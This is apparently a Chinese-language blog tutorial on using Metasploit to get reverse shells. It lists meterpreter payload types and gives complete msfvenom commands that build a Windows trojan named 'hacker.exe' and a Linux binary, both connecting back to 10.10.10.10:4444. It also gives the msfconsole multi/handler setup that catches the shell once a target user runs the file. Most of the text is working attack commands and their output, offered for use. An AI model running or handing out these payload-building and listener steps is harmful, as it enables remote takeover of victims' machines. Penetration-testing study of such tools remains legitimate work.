Metasploit使用教程-(反弹shell)

发布时间 2023-11-01 12:20:24作者: 少年阿丁

Metasploit 反弹 shell 

利用msfvenom生成一个反弹shell程序 

msfvenom -l payloads可以查看所有payload

Windows 通用反向 shell:

windows/meterpreter/reverse  --基于 TCP 的反向链接反弹 shell,使用起来很稳定。

windows/meterpreter/reverse_http  --基于 http 方式的反向连接,在网速慢的情况下不稳定

windows/meterpreter/reverse_https  --基于 https 方式的反向连接,在网速慢的情况下不稳定, https如果反弹没有收到数据,可以将监听端口换成 443 试试。

windows/meterpreter/bind_tcp  --这是一个基于TCP的正向连接 shell,因为在内网跨网段时无法连接到attack的机器,所以在内网中经常会使用,不需要设置 LHOST。

生成 window 木马命令

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.10.10 lport=4444 -f exe -o D:\Test\tmp\hacker.exe

Linux 通用反向 shell:

linux/x86/meterpreter/reverse_tcp

linux/x86/shell_reverse_tcp

生成 linux 木马命令

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f elf -o /tmp/client_x64.bin

打开msfconsole创建侦察监听(根据上一步生成的木马类型选择payload)

msfconsole

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 10.10.10.10
lhost => 10.10.10.10
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > run
[*] Started reverse TCP handler on 10.10.10.10:4444

目标用户运行hacker.exe,本地可成功连接。